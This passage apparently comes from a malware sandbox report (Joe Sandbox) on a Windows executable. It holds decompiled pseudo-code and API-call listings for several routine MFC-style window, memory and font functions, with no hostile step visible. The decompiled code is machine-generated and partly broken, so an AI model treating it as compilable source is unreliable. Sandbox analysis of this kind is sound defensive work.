                  											E0040CEE2( &_v128,  *(_t341 + 0x20),  &_v64);
                  										}
                  										_t230 = _v40;
                  										_t350 = _v64.top -  *0x466524 + _v36;
                  										__eflags = _v16 - _t230;
                  										_v44 = _t350;
                  										if(_v16 > _t230) {
                  											goto L59;
                  										} else {
                  											_v16 = _t230;
                  											goto L58;
                  										}
                  									}
                  								} else {
                  									_t252 = _v80.left;
                  									if(_t252 > _v64.left &&  *((intOrPtr*)(_v8 + 0x98)) == 0) {
                  										OffsetRect( &_v64, _t252 - _v64.left, 0);
                  									}
                  									_t253 = _v64.right;
                  									_t323 = _v32;
                  									if(_t253 > _t323 &&  *((intOrPtr*)(_v8 + 0x98)) == 0) {
                  										OffsetRect( &_v64, _t275 - _v64.left, 0);
                  									}
                  									if(_v20 == 0) {
                  										__eflags = _v64.left - _v32 -  *0x466520;
                  										if(_v64.left < _v32 -  *0x466520) {
                  											goto L27;
                  										}
                  										__eflags = _v12;
                  										if(_v12 <= 0) {
                  											goto L27;
                  										}
                  										_t267 = E0040B917(_v8 + 0x9c, _v12 - 1);
                  										__eflags =  *_t267;
                  										if( *_t267 == 0) {
                  											goto L27;
                  										}
                  										L37:
                  										_push(1);
                  										_push(0);
                  										E004260F4(_t287, _v8 + 0x9c, 1, _v12);
                  										_v20 = 1;
                  										goto L61;
                  									} else {
                  										_t268 =  *0x466520; // 0x2
                  										_v20 = _v20 & 0x00000000;
                  										OffsetRect( &_v64,  ~(_t268 + _v64.left), 0);
                  										L27:
                  										if(EqualRect( &_v64,  &_v80) == 0) {
                  											if( *((intOrPtr*)(_v8 + 0xb0)) == 0 && ( *(_t341 + 0x84) & 0x00000001) == 0) {
                  												asm("movsd");
                  												asm("movsd");
                  												asm("movsd");
                  												asm("movsd");
                  												_t350 = _v44;
                  												_t341 = _v24;
                  											}
                  											E0040CEE2( &_v128,  *(_t341 + 0x20),  &_v64);
                  										}
                  										_t259 = _v36;
                  										_t287 = _v40 -  *0x466520 + _v64.left;
                  										if(_v16 <= _t259) {
                  											_v16 = _t259;
                  										}
                  										goto L59;
                  									}
                  								}
                  								L74:
                  								_v12 = _v12 + 1;
                  								_t199 = _v8;
                  							} while (_v12 <  *((intOrPtr*)(_t199 + 0xa4)));
                  							_t340 = _t199;
                  							_t187 = 0;
                  							goto L76;
                  						}
                  					}
                  				}
                  				L1:
                  				E00406436(_t285, _t291, _t338, _t348, _t357);
                  				goto L2;
                  			}

                  APIs
                  • IsRectEmpty.USER32 ref: 00413B90
                  • GetWindowRect.USER32 ref: 00413CBC
                    • Part of subcall function 00406436: __CxxThrowException@8.LIBCMT ref: 0040644C
                    • Part of subcall function 00406436: __EH_prolog3.LIBCMT ref: 00406459
                  • GetClientRect.USER32 ref: 00413BD2
                  • BeginDeferWindowPos.USER32 ref: 00413BFF
                  • OffsetRect.USER32(?,?,00000000), ref: 00413CF6
                  • OffsetRect.USER32(?,?,00000000), ref: 00413D2F
                  • OffsetRect.USER32(?,00000002,00000000), ref: 00413D56
                  • EqualRect.USER32 ref: 00413D64
                  • OffsetRect.USER32(?,00000000,?), ref: 00413E3F
                  • OffsetRect.USER32(?,00000000,?), ref: 00413E78
                  • OffsetRect.USER32(?,00000000,?), ref: 00413E9B
                  • EqualRect.USER32 ref: 00413EDB
                  • KiUserCallbackDispatcher.NTDLL(?), ref: 00413FEC
                  • SetRectEmpty.USER32(?), ref: 00413FF6
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Rect$Offset$EmptyEqualWindow$BeginCallbackClientDeferDispatcherException@8H_prolog3ThrowUser
                  • String ID:
                  • API String ID: 3576052098-0
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 303 42fe1c-42fe61 call 41f363 GetModuleFileNameA 306 42fe63-42fe65 303->306 307 42fe67 call 42282a 303->307 306->307 308 42fe6c-42fe81 PathFindExtensionA 306->308 307->308 310 42fe83 call 42282a 308->310 311 42fe88-42fea7 call 42fddc 308->311 310->311 315 42fea9 call 42282a 311->315 316 42feae-42feb2 311->316 315->316 318 42feb4-42fec6 call 433ccf 316->318 319 42fecd-42fed2 316->319 318->319 331 42fec8 call 4063fe 318->331 321 42ff07-42ff0e 319->321 322 42fed4-42feec call 41b239 319->322 323 42ff10-42ff1d 321->323 324 42ff5b-42ff5f 321->324 333 42fef7 322->333 334 42feee-42fef5 322->334 329 42ff26 323->329 330 42ff1f-42ff24 323->330 327 42ff93-42ffa1 call 430650 324->327 328 42ff61-42ff8d call 4317a1 call 4048c1 call 433ccf 324->328 328->327 328->331 337 42ff2b-42ff4c call 414fee call 433ccf 329->337 330->337 331->319 339 42fefa-42ff05 call 433ccf 333->339 334->339 337->331 352 42ff52-42ff58 337->352 339->321 339->331 352->324
                  C-Code - Quality: 62%
                  			E0042FE1C(void* __ecx, void* __edx, void* __eflags) {
                  				signed int _v8;
                  				char _v268;
                  				char _v528;
                  				char _v784;
                  				char* _v788;
                  				void* __ebx;
                  				void* __edi;
                  				void* __esi;
                  				void* __ebp;
                  				signed int _t35;
                  				long _t41;
                  				char* _t44;
                  				void* _t57;
                  				intOrPtr _t60;
                  				intOrPtr _t65;
                  				void* _t68;
                  				void* _t70;
                  				void* _t74;
                  				void* _t75;
                  				void* _t76;
                  				void* _t77;
                  				void* _t79;
                  				void* _t80;
                  				signed int _t84;
                  				void* _t85;
                  
                  				_t74 = __edx;
                  				_t71 = __ecx;
                  				_t82 = _t84;
                  				_t85 = _t84 - 0x310;
                  				_t35 =  *0x463404; // 0x38a11573
                  				_v8 = _t35 ^ _t84;
                  				_push(_t68);
                  				_push(_t75);
                  				_t79 = __ecx;
                  				_t76 = E0041F363(_t68, _t75, __ecx, __eflags);
                  				 *(_t76 + 8) =  *(_t79 + 0x44);
                  				 *(_t76 + 0xc) =  *(_t79 + 0x44);
                  				_t41 = GetModuleFileNameA( *(_t79 + 0x44),  &_v268, 0x104);
                  				if(_t41 == 0 || _t41 == 0x104) {
                  					E0042282A(_t71);
                  				}
                  				_t44 = PathFindExtensionA( &_v268); // executed
                  				_v788 = _t44;
                  				if(_t44 == 0) {
                  					E0042282A(_t71);
                  				}
                  				 *_v788 = 0;
                  				if(E0042FDDC( &_v268,  &_v528, 0x104) != 0) {
                  					E0042282A(_t71);
                  				}
                  				if( *((intOrPtr*)(_t79 + 0x60)) == 0) {
                  					_t65 = E00433CCF( &_v528);
                  					_pop(_t71);
                  					 *((intOrPtr*)(_t79 + 0x60)) = _t65;
                  					_t93 = _t65;
                  					if(_t65 == 0) {
                  						L10:
                  						E004063FE(0x104, _t71, _t76, _t79, _t93);
                  					}
                  				}
                  				_t49 =  *((intOrPtr*)(_t79 + 0x50));
                  				if(_t49 == 0) {
                  					if(E0041B239(0x104, _t71, _t76, _t79, 0xe000,  &_v784, 0x100) == 0) {
                  						_push( *((intOrPtr*)(_t79 + 0x60)));
                  					} else {
                  						_push( &_v784);
                  					}
                  					_t49 = E00433CCF();
                  					 *((intOrPtr*)(_t79 + 0x50)) = _t49;
                  					_pop(_t71);
                  					if(_t49 == 0) {
                  						goto L10;
                  					}
                  				}
                  				 *((intOrPtr*)(_t76 + 0x10)) = _t49;
                  				if( *((intOrPtr*)(_t79 + 0x64)) == 0) {
                  					_t57 =  &_v8 - _v788;
                  					if( *((intOrPtr*)(_t79 + 0x6c)) != 1) {
                  						_push(".HLP");
                  					} else {
                  						_push(".CHM");
                  					}
                  					_push(_t57);
                  					_push(_v788);
                  					E00414FEE(0x104, _t74, _t76, _t79);
                  					_t85 = _t85 + 0xc;
                  					_t60 = E00433CCF( &_v268);
                  					_pop(_t71);
                  					 *((intOrPtr*)(_t79 + 0x64)) = _t60;
                  					if(_t60 == 0) {
                  						goto L10;
                  					} else {
                  						_t49 = _v788;
                  						 *_v788 = 0;
                  					}
                  				}
                  				if( *((intOrPtr*)(_t79 + 0x68)) == 0) {
                  					E004048C1(0x104, _t71, _t76, _t79, E004317A1(_t74,  &_v528, 0x104, ".INI"));
                  					_t49 = E00433CCF( &_v528);
                  					_t85 = _t85 + 0x14;
                  					 *((intOrPtr*)(_t79 + 0x68)) = _t49;
                  					if(_t49 == 0) {
                  						goto L10;
                  					}
                  				}
                  				_pop(_t77);
                  				_pop(_t80);
                  				_pop(_t70);
                  				return E00430650(_t49, _t70, _v8 ^ _t82, _t74, _t77, _t80);
                  			}

                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: __strdup$ExtensionFileFindModuleNamePath_strcat_s
                  • String ID: .CHM$.HLP$.INI
                  • API String ID: 1153805871-4017452060
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 353 4206ea-42070b EnterCriticalSection 354 42071a-42071f 353->354 355 42070d-420714 353->355 357 420721-420724 354->357 358 42073c-420744 354->358 355->354 356 4207d8-4207db 355->356 360 4207e3-420801 LeaveCriticalSection 356->360 361 4207dd-4207e0 356->361 359 420727-42072a 357->359 362 420746-420759 call 4148c1 GlobalAlloc 358->362 363 42075b-42077f GlobalHandle GlobalUnlock call 4148c1 GlobalReAlloc 358->363 364 420734-420736 359->364 365 42072c-420732 359->365 361->360 370 420785-420787 362->370 363->370 364->356 364->358 365->359 365->364 371 420789-42078e 370->371 372 4207ac-4207d5 GlobalLock call 431160 370->372 374 420790-420798 GlobalHandle GlobalLock 371->374 375 42079e-4207a7 LeaveCriticalSection call 4063fe 371->375 372->356 374->375 375->372
                  C-Code - Quality: 90%
                  			E004206EA(void* __ecx) {
                  				struct _CRITICAL_SECTION* _v8;
                  				void* _v12;
                  				void* __ebx;
                  				void* __edi;
                  				void* __esi;
                  				void* __ebp;
                  				struct _CRITICAL_SECTION* _t34;
                  				void* _t35;
                  				void* _t36;
                  				long _t38;
                  				void* _t39;
                  				void* _t40;
                  				long _t51;
                  				signed char* _t53;
                  				intOrPtr _t56;
                  				signed int _t57;
                  				void* _t61;
                  				signed int _t68;
                  				void* _t72;
                  
                  				_t59 = __ecx;
                  				_push(__ecx);
                  				_push(__ecx);
                  				_t72 = __ecx;
                  				_t1 = _t72 + 0x1c; // 0x466584
                  				_t34 = _t1;
                  				_v8 = _t34;
                  				EnterCriticalSection(_t34);
                  				_t3 = _t72 + 4; // 0x20
                  				_t56 =  *_t3;
                  				_t4 = _t72 + 8; // 0x3
                  				_t68 =  *_t4;
                  				if(_t68 >= _t56) {
                  					L2:
                  					_t68 = 1;
                  					if(_t56 <= 1) {
                  						L7:
                  						_t13 = _t72 + 0x10; // 0x7e0110
                  						_t35 =  *_t13;
                  						_t57 = _t56 + 0x20;
                  						_t83 = _t35;
                  						if(_t35 != 0) {
                  							_t36 = GlobalHandle(_t35);
                  							_v12 = _t36;
                  							GlobalUnlock(_t36);
                  							_t38 = E004148C1(_t59, __eflags, _t57, 8);
                  							_t61 = 0x2002;
                  							_t39 = GlobalReAlloc(_v12, _t38, ??);
                  						} else {
                  							_t51 = E004148C1(_t59, _t83, _t57, 8);
                  							_pop(_t61);
                  							_t39 = GlobalAlloc(2, _t51); // executed
                  						}
                  						if(_t39 == 0) {
                  							_t16 = _t72 + 0x10; // 0x7e0110
                  							_t72 =  *_t16;
                  							_t85 = _t72;
                  							if(_t72 != 0) {
                  								GlobalLock(GlobalHandle(_t72));
                  							}
                  							LeaveCriticalSection(_v8);
                  							_t39 = E004063FE(_t57, _t61, _t68, _t72, _t85);
                  						}
                  						_t40 = GlobalLock(_t39);
                  						_t18 = _t72 + 4; // 0x0
                  						_v12 = _t40;
                  						E00431160(_t68, _t40 +  *_t18 * 8, 0, _t57 -  *_t18 << 3);
                  						 *(_t72 + 4) = _t57;
                  						 *(_t72 + 0x10) = _v12;
                  					} else {
                  						_t10 = _t72 + 0x10; // 0x7e0110
                  						_t53 =  *_t10 + 8;
                  						while(( *_t53 & 0x00000001) != 0) {
                  							_t68 = _t68 + 1;
                  							_t53 =  &(_t53[8]);
                  							if(_t68 < _t56) {
                  								continue;
                  							}
                  							break;
                  						}
                  						if(_t68 >= _t56) {
                  							goto L7;
                  						}
                  					}
                  				} else {
                  					_t5 = _t72 + 0x10; // 0x7e0110
                  					if(( *( *_t5 + _t68 * 8) & 0x00000001) != 0) {
                  						goto L2;
                  					}
                  				}
                  				_t25 = _t72 + 0xc; // 0x0
                  				if(_t68 >=  *_t25) {
                  					_t26 = _t68 + 1; // 0x1
                  					 *((intOrPtr*)(_t72 + 0xc)) = _t26;
                  				}
                  				_t28 = _t72 + 0x10; // 0x7e0110
                  				 *( *_t28 + _t68 * 8) =  *( *_t28 + _t68 * 8) | 0x00000001;
                  				_t32 = _t68 + 1; // 0x4
                  				 *(_t72 + 8) = _t32;
                  				LeaveCriticalSection(_v8);
                  				return _t68;
                  			}

                  APIs
                  • EnterCriticalSection.KERNEL32(00466584,?,?,?,00466568,00466568,?,00420B40,00000004,0041F372,00406452,00411FA3), ref: 004206FD
                  • GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,00466568,00466568,?,00420B40,00000004,0041F372,00406452,00411FA3), ref: 00420753
                  • GlobalHandle.KERNEL32 ref: 0042075C
                  • GlobalUnlock.KERNEL32(00000000,?,?,?,00466568,00466568,?,00420B40,00000004,0041F372,00406452,00411FA3), ref: 00420766
                  • GlobalReAlloc.KERNEL32(00406452,00000000,00002002), ref: 0042077F
                  • GlobalHandle.KERNEL32 ref: 00420791
                  • GlobalLock.KERNEL32 ref: 00420798
                  • LeaveCriticalSection.KERNEL32(00411FA3,?,?,?,00466568,00466568,?,00420B40,00000004,0041F372,00406452,00411FA3), ref: 004207A1
                  • GlobalLock.KERNEL32 ref: 004207AD
                  • _memset.LIBCMT ref: 004207C7
                  • LeaveCriticalSection.KERNEL32(00411FA3,0041F372,00406452,00411FA3), ref: 004207F5
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Global$CriticalSection$AllocHandleLeaveLock$EnterUnlock_memset
                  • String ID:
                  • API String ID: 496899490-0
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  C-Code - Quality: 96%
                  			E00410B6D(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                  				_Unknown_base(*)()* _t31;
                  				void* _t33;
                  				void* _t34;
                  				long _t39;
                  				void* _t40;
                  				void* _t43;
                  				void* _t61;
                  				void* _t65;
                  				struct HWND__* _t67;
                  				CHAR* _t69;
                  				void* _t72;
                  
                  				_t65 = __edx;
                  				_t61 = __ecx;
                  				_push(0x40);
                  				E00431ACE(E0044B0B7, __ebx, __edi, __esi);
                  				_t67 =  *(_t72 + 8);
                  				_t69 = "AfxOldWndProc423";
                  				_t31 = GetPropA(_t67, _t69);
                  				 *(_t72 - 0x14) =  *(_t72 - 0x14) & 0x00000000;
                  				 *(_t72 - 4) =  *(_t72 - 4) & 0x00000000;
                  				 *(_t72 - 0x18) = _t31;
                  				_t59 = 1;
                  				_t33 =  *(_t72 + 0xc) - 6;
                  				if(_t33 == 0) {
                  					_t34 = E0040EE3C(1, _t61,  *(_t72 + 0x14));
                  					E00410A7D(_t61, E0040EE3C(1, _t61, _t67),  *(_t72 + 0x10), _t34);
                  					goto L9;
                  				} else {
                  					_t40 = _t33 - 0x1a;
                  					if(_t40 == 0) {
                  						_t59 = 0 | E00410AF5(1, _t67, E0040EE3C(1, _t61, _t67),  *(_t72 + 0x14),  *(_t72 + 0x14) >> 0x10) == 0x00000000;
                  						L9:
                  						if(_t59 != 0) {
                  							goto L10;
                  						}
                  					} else {
                  						_t43 = _t40 - 0x62;
                  						if(_t43 == 0) {
                  							SetWindowLongA(_t67, 0xfffffffc,  *(_t72 - 0x18));
                  							RemovePropA(_t67, _t69);
                  							GlobalDeleteAtom(GlobalFindAtomA(_t69) & 0x0000ffff);
                  							goto L10;
                  						} else {
                  							if(_t43 != 0x8e) {
                  								L10:
                  								_t39 = CallWindowProcA( *(_t72 - 0x18), _t67,  *(_t72 + 0xc),  *(_t72 + 0x10),  *(_t72 + 0x14)); // executed
                  								 *(_t72 - 0x14) = _t39;
                  							} else {
                  								E0040D7C1(E0040EE3C(1, _t61, _t67), _t72 - 0x30, _t72 - 0x20);
                  								 *(_t72 - 0x14) = CallWindowProcA( *(_t72 - 0x18), _t67, 0x110,  *(_t72 + 0x10),  *(_t72 + 0x14));
                  								E0040F5B7(1, _t65, _t50, _t72 - 0x30,  *((intOrPtr*)(_t72 - 0x20)));
                  							}
                  						}
                  					}
                  				}
                  				return E00431B73( *(_t72 - 0x14));
                  			}















                  APIs
                  Strings
                  Similarity
                  • API ID: Window$AtomCallGlobalProcProp$DeleteFindH_prolog3_catchLongRectRemove
                  • String ID: AfxOldWndProc423
                  • API String ID: 2109165785-1060338832
                  • Opcode ID: f8daf118ba78ef8a89b28ddf675110c5a81804194b7a1092223d3a2c73349c4a
                  • Instruction ID: 7d730690561c9216d8e88f9ae386013ec32041a0da163b1d26ff2b3a16a30a38
                  • Opcode Fuzzy Hash: f8daf118ba78ef8a89b28ddf675110c5a81804194b7a1092223d3a2c73349c4a
                  • Instruction Fuzzy Hash: 2B316D32800219BBCF11AFE6DD4DDFF7A78BF09305F00052AF501B2161DB7999A09BA9
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  C-Code - Quality: 100%
                  			E004064F0(void* __ecx) {
                  				struct HDC__* _v8;
                  				void* _v12;
                  				int _t9;
                  				int _t15;
                  				void* _t20;
                  
                  				_t9 =  *0x462634; // 0xf
                  				if(_t9 == 0xffffffff) {
                  					_v8 = GetDC(0);
                  					_v12 = 0;
                  					_t20 = CreateFontA(GetSystemMetrics(0x48), 0, 0, 0, 0x190, 0, 0, 0, 2, 0, 0, 0, 0, "Marlett");
                  					if(_t20 != 0) {
                  						_v12 = SelectObject(_v8, _t20);
                  					}
                  					GetCharWidthA(_v8, 0x36, 0x36, 0x462634); // executed
                  					if(_t20 != 0) {
                  						SelectObject(_v8, _v12);
                  						DeleteObject(_t20);
                  					}
                  					ReleaseDC(0, _v8);
                  					_t15 =  *0x462634; // 0xf
                  					return _t15;
                  				}
                  				return _t9;
                  			}









                  APIs
                  • GetDC.USER32(00000000), ref: 0040650B
                  • GetSystemMetrics.USER32 ref: 0040652F
                  • CreateFontA.GDI32(00000000), ref: 00406536
                  • SelectObject.GDI32(?,00000000), ref: 0040654C
                  • GetCharWidthA.GDI32(?,00000036,00000036,00462634), ref: 0040655D
                  • SelectObject.GDI32(?,?), ref: 0040656D
                  • DeleteObject.GDI32(00000000), ref: 00406570
                  • ReleaseDC.USER32 ref: 0040657A
                  Strings
                  Similarity
                  • API ID: Object$Select$CharCreateDeleteFontMetricsReleaseSystemWidth
                  • String ID: Marlett
                  • API String ID: 1397664628-3688754224
                  • Opcode ID: d625e81e30d2d5b5eacfecf79bbbfade7bba1e7911b5c54bb0e160659e22b730
                  • Instruction ID: e81e0d02648677b469a39f7f1f5c13e3aea240fbea2e15458392ef8c70e3ee26
                  • Opcode Fuzzy Hash: d625e81e30d2d5b5eacfecf79bbbfade7bba1e7911b5c54bb0e160659e22b730
                  • Instruction Fuzzy Hash: 2C118E35942224BBD7215BA2ED4EDCFBE2DFF16BA0F510021F109A11A0C6B10E00CBA8
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  C-Code - Quality: 100%
                  			E0042143D(void* __ecx, int _a4) {
                  				int _v8;
                  				struct tagRECT _v24;
                  				long _t39;
                  				int _t42;
                  				int _t43;
                  				int _t62;
                  				int _t66;
                  				void* _t68;
                  				long _t69;
                  				int _t71;
                  
                  				_t69 = _a4;
                  				_t68 = __ecx;
                  				_t39 = DefWindowProcA( *(__ecx + 0x20), 0x46, 0, _t69); // executed
                  				if(( *(_t69 + 0x18) & 0x00000001) == 0) {
                  					GetWindowRect( *(_t68 + 0x20),  &_v24);
                  					_t42 = _a4;
                  					_t66 =  *(_t42 + 0x10);
                  					_t71 = _v24.right - _v24.left;
                  					_t62 = _v24.bottom - _v24.top;
                  					_t43 =  *(_t42 + 0x14);
                  					_v8 = _t66;
                  					_a4 = _t43;
                  					if(_t66 != _t71 && ( *(_t68 + 0x84) & 0x00000400) != 0) {
                  						SetRect( &_v24, _t66 -  *0x466520, 0, _t66, _t43);
                  						InvalidateRect( *(_t68 + 0x20),  &_v24, 1);
                  						SetRect( &_v24, _t71 -  *0x466520, 0, _t71, _a4);
                  						InvalidateRect( *(_t68 + 0x20),  &_v24, 1);
                  						_t66 = _v8;
                  						_t43 = _a4;
                  					}
                  					if(_t43 != _t62 && ( *(_t68 + 0x84) & 0x00000800) != 0) {
                  						SetRect( &_v24, 0, _t43 -  *0x466524, _t66, _t43);
                  						InvalidateRect( *(_t68 + 0x20),  &_v24, 1);
                  						SetRect( &_v24, 0, _t62 -  *0x466524, _v8, _t62);
                  						_t43 = InvalidateRect( *(_t68 + 0x20),  &_v24, 1);
                  					}
                  					return _t43;
                  				}
                  				return _t39;
                  			}














                  APIs
                  • DefWindowProcA.USER32(?,00000046,00000000,?,?,?), ref: 00421454
                  • GetWindowRect.USER32 ref: 0042146C
                  • SetRect.USER32 ref: 004214AC
                  • InvalidateRect.USER32(?,?,00000001), ref: 004214BB
                  • SetRect.USER32 ref: 004214D2
                  • InvalidateRect.USER32(?,?,00000001), ref: 004214E1
                  • SetRect.USER32 ref: 00421512
                  • InvalidateRect.USER32(?,?,00000001), ref: 0042151D
                  • SetRect.USER32 ref: 00421534
                  • InvalidateRect.USER32(?,?,00000001), ref: 0042153F
                  Similarity
                  • API ID: Rect$Invalidate$Window$Proc
                  • String ID:
                  • API String ID: 570070710-0
                  • Opcode ID: 600d90e0c36db47e27be2003a9a329f79ea7bd473ed92dd9532af274cc9c2e19
                  • Instruction ID: 67fc1e0d515d65dd7be6bb3fc1ba63dd0bc7bc45e6ac663643d9f47821cdaeb9
                  • Opcode Fuzzy Hash: 600d90e0c36db47e27be2003a9a329f79ea7bd473ed92dd9532af274cc9c2e19
                  • Instruction Fuzzy Hash: 25311A76A00119BFDB14CFA4DD89FAABB7CFB08300F110165FA05A7160D770AA54CBA5
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  C-Code - Quality: 92%
                  			E0040F201(int __ecx, intOrPtr _a4, intOrPtr _a8, signed int _a12, signed int _a16, struct tagRECT* _a20, signed int _a24, intOrPtr _a28) {
                  				int _v8;
                  				intOrPtr _v12;
                  				int _v16;
                  				int _v20;
                  				struct tagRECT _v36;
                  				void* _v40;
                  				void* __ebx;
                  				void* __edi;
                  				void* __esi;
                  				signed int _t61;
                  				int _t62;
                  				signed int _t64;
                  				int _t72;
                  				intOrPtr* _t84;
                  				struct HWND__* _t90;
                  
                  				_t72 = __ecx;
                  				_t74 = _a28;
                  				_v8 = 0;
                  				_v12 = _a28;
                  				_v16 = 0;
                  				_v20 = 0;
                  				if(_a24 == 0) {
                  					GetClientRect( *(__ecx + 0x20),  &_v36);
                  				} else {
                  					asm("movsd");
                  					asm("movsd");
                  					asm("movsd");
                  					asm("movsd");
                  				}
                  				_t61 = _a16 & 0xffff7fff;
                  				_a24 = _t61;
                  				if(_t61 == 1) {
                  					_t13 =  &_v40;
                  					 *_t13 = _v40 & 0x00000000;
                  					__eflags =  *_t13;
                  				} else {
                  					_v40 = BeginDeferWindowPos(8);
                  				}
                  				_t62 = GetTopWindow( *(_t72 + 0x20));
                  				while(1) {
                  					_t90 = _t62;
                  					if(_t90 == 0) {
                  						break;
                  					}
                  					_t72 = GetDlgCtrlID(_t90);
                  					_t64 = E0040EE68(_t74, 0, _t90, __eflags, _t90);
                  					__eflags = _t72 - _a12;
                  					if(__eflags != 0) {
                  						__eflags = _t72 - _a4;
                  						if(__eflags >= 0) {
                  							__eflags = _t72 - _a8;
                  							if(__eflags <= 0) {
                  								__eflags = _t64;
                  								if(__eflags != 0) {
                  									SendMessageA(_t90, 0x361, 0,  &_v40); // executed
                  								}
                  							}
                  						}
                  					} else {
                  						_v8 = _t90;
                  					}
                  					_t62 = GetWindow(_t90, 2);
                  				}
                  				if(_a24 != 1) {
                  					__eflags = _a12;
                  					if(_a12 != 0) {
                  						__eflags = _v8;
                  						if(_v8 != 0) {
                  							_t62 = E0040EE3C(_t72, _t74, _v8);
                  							__eflags = _a24 - 2;
                  							if(_a24 == 2) {
                  								_t84 = _a20;
                  								_v36.left = _v36.left +  *_t84;
                  								_v36.top = _v36.top +  *((intOrPtr*)(_t84 + 4));
                  								_v36.right = _v36.right -  *((intOrPtr*)(_t84 + 8));
                  								_t45 =  &(_v36.bottom);
                  								 *_t45 = _v36.bottom -  *((intOrPtr*)(_t84 + 0xc));
                  								__eflags =  *_t45;
                  							}
                  							__eflags = _a16 & 0x00008000;
                  							if((_a16 & 0x00008000) == 0) {
                  								 *((intOrPtr*)( *_t62 + 0x68))( &_v36, 0);
                  								_t62 = E0040CEE2( &_v40, _v8,  &_v36);
                  							}
                  						}
                  					}
                  					__eflags = _v40;
                  					if(_v40 != 0) {
                  						_t62 = EndDeferWindowPos(_v40); // executed
                  					}
                  				} else {
                  					if(_a28 == 0) {
                  						_t62 = _a20;
                  						 *((intOrPtr*)(_t62 + 8)) = _v20;
                  						 *((intOrPtr*)(_t62 + 4)) = 0;
                  						 *_t62 = 0;
                  						 *((intOrPtr*)(_t62 + 0xc)) = _v16;
                  					} else {
                  						_t62 = CopyRect(_a20,  &_v36);
                  					}
                  				}
                  				return _t62;
                  			}



















                  APIs
                  • GetClientRect.USER32 ref: 0040F236
                  • BeginDeferWindowPos.USER32 ref: 0040F24E
                  • GetTopWindow.USER32(00000001), ref: 0040F260
                  • GetDlgCtrlID.USER32 ref: 0040F26B
                  • SendMessageA.USER32(00000000,00000361,00000000,00000000), ref: 0040F29C
                  • GetWindow.USER32(00000000,00000002), ref: 0040F2A5
                  • CopyRect.USER32 ref: 0040F2C3
                  • KiUserCallbackDispatcher.NTDLL(00000000,?,00000001), ref: 0040F340
                  Similarity
                  • API ID: Window$Rect$BeginCallbackClientCopyCtrlDeferDispatcherMessageSendUser
                  • String ID:
                  • API String ID: 1656430526-0
                  • Opcode ID: 6d2dbe2eeacec313d78451a0fb5afa6627e160b037f6c151f147efc9526f9ac5
                  • Instruction ID: 0940655b8c9f504fb26903620ff38c1a6262de45de23ed48141b808c52172a37
                  • Opcode Fuzzy Hash: 6d2dbe2eeacec313d78451a0fb5afa6627e160b037f6c151f147efc9526f9ac5
                  • Instruction Fuzzy Hash: 6A417B75900209EFCF20DF95C8849EEB7B5FF49314B1441BAE801B7290D7399A45CFA9
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  C-Code - Quality: 100%
                  			E004203BF(void* __ecx) {
                  				int _t5;
                  				struct HDC__* _t15;
                  				void* _t17;
                  
                  				_t17 = __ecx; // executed
                  				_t5 = GetSystemMetrics(0xb); // executed
                  				 *((intOrPtr*)(_t17 + 8)) = _t5;
                  				 *((intOrPtr*)(_t17 + 0xc)) = GetSystemMetrics(0xc);
                  				 *0x466510 = GetSystemMetrics(2) + 1;
                  				 *0x466514 = GetSystemMetrics(3) + 1;
                  				_t15 = GetDC(0);
                  				 *((intOrPtr*)(_t17 + 0x18)) = GetDeviceCaps(_t15, 0x58);
                  				 *((intOrPtr*)(_t17 + 0x1c)) = GetDeviceCaps(_t15, 0x5a);
                  				return ReleaseDC(0, _t15);
                  			}







                  APIs
                  • KiUserCallbackDispatcher.NTDLL ref: 004203CE
                  • GetSystemMetrics.USER32 ref: 004203D5
                  • GetSystemMetrics.USER32 ref: 004203DC
                  • GetSystemMetrics.USER32 ref: 004203E6
                  • GetDC.USER32(00000000), ref: 004203F0
                  • GetDeviceCaps.GDI32(00000000,00000058), ref: 00420401
                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00420409
                  • ReleaseDC.USER32 ref: 00420411
                  Similarity
                  • API ID: MetricsSystem$CapsDevice$CallbackDispatcherReleaseUser
                  • String ID:
                  • API String ID: 1031845853-0
                  • Opcode ID: b9b20a255bf8ec8179fb1d58bd2a46d1a8caece91da757cd9b7519637d2d4eb4
